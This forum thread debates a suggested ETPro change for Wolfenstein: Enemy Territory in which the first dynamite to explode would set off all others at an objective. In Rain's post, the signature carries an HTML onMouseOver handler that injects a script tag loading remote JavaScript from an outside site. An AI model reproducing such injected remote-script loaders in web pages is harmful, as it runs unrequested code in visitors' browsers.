Suggestion: First dyno blows others

Discussion for Bani's Pub mod

Moderators: Forum moderators, developers

:TnE:Beastman

Suggestion: First dyno blows others

Post by :TnE:Beastman »

This post was moved to BayonET for some reason before so I'm posting it here again. This is a suggestion for ETPRO!!!
-------------------------

This is an idea that I had the other day and its probably already been suggested before. Its pretty common that when planting dynamite on an objective, you plant multiple sticks to make sure it gets taken care of. The only problem is that you have to wait for all of them to go off. This can sometimes cause problems. Eg. trying to get through tank barriers on Goldrush.

My idea is that once the first dyno has gone off, all other dyno at that objective that is currently armed will go off as well. This way, you don't have to wait for everything to go off before passing through. XP would still work the same way as the first one to go off would only give XP.

Just a small idea I thought might make a little difference in ET.
Threshold

Post by Threshold »

Like I said before. I feel if a team plants more than one Dyno it's there own fault and they should have to wait.

I don't think so because planting excess dyno is a strategy. Its extremely helpful. Someone may defuse the wrong one first and not have time to defuse the one ready to blow. Smart teams plant excess but having to wait, sometimes close to 30 seconds, can be a deal breaker in a match. I've seen it first hand.
Threshold

Post by Threshold »

:TnE:Beastman wrote:I don't think so because planting excess dyno is a strategy. Its extremely helpful. Someone may defuse the wrong one first and not have time to defuse the one ready to blow. Smart teams plant excess but having to wait, sometimes close to 30 seconds, can be a deal breaker in a match. I've seen it first hand.
Yeah but using that strategy comes at a price. You plant two you have to wait for the other one to blow.

YOu say this is a common problem? Common with who? You are the first personthat has ever brought this up. I have played in many many matches and it's part of the game.
KingJackaL

Post by KingJackaL »

Yeah, it's a simple tradeoff. The more you plant, the more likely you are to blow up the objective... and the more likely you are to blow yourself up.

Best example of this was the bunker/breach in mp_beach in RTCW ( and now ET ), where clans would only plant 1 dyna - despite axis defuses being very possible. Why? Because they'd rather try and defend it actively, thus meaning they could push faster past that point of the map.

( wall boost asside :P )
bani
Site Admin

Re: Suggestion: First dyno blows others

Post by bani »

:TnE:Beastman wrote:This post was moved to BayonET for some reason before so I'm posting it here again. This is a suggestion for ETPRO!!!
not appropriate for a competition mod, moved to bayonet forum
Rain

Post by Rain »

One thing you should think about when dreaming up new features is the potential for them to be abused.

Easy example: plant one dynamite outside of the objective trigger, and plant another one inside of the objective area 25 seconds later. Enemy team gets 5 seconds of warning.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>

Actually its very suitable for a competition mod. Stop moving my shit for no reason. I'll just have to post this ONCE AGAIN in the ETpro forum.

And the reasoning Rain gave doesn't make sense because outside the trigger wouldn't do anything.
gotenks

Post by gotenks »

it'd blow the dyno by the trigger, so yes it does make sence, fun idea but bad for comps
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
KingJackaL

Post by KingJackaL »

Yeah I agree it's bad for comp's. Clans shouldn't be throwing an 'awww, now we have to wait for them all to blow' teary - as they were well capable of deciding to only plant one ( at the risk of it being easier to defuse for the enemy ).

I'd possibly use it on pubs though, because it would mean less dyna TK's - and that's gotta be a good thing for a pub ( less rage, etc ).
SickBoy

Post by SickBoy »

nah even for pubs/bayonet this idea sucks because it would be so easy to abuse as others have already pointed out in this and other incarnations of this thread. Even if it was fixed so it couldn't be abused, I still find it a dumb idea.

If people are dumb enough to walk near a rapidly red flashing dynamite and get blasted by it, that's their problem, not the game's.

Maybe make a dyna planted at an objective killing a teammate not count as a tk and no complain possibility would be much better.
Mano de Dios

Post by Mano de Dios »

I totally agree with many of the comments posted here. It's a novel idea, but I don't find the value for competition.

In ET, there are always multiple ways to get to a location. There's no reason to run by a red-flashing dynamite.

If you feel the need to plant two dynos because you fear you may not be able to defend one, then that is your strat and you have to live with it. If you still want to rush forward after the first dyno blows, why not defuse it yourself?
newio

Post by newio »

my clan isn't sitting behind the objective while its waiting to be blown anyway. We are in front of it fighting an offensive. And even if someone does need to get past the dyna, they won't be a pussy and sit there to wait for it to go off...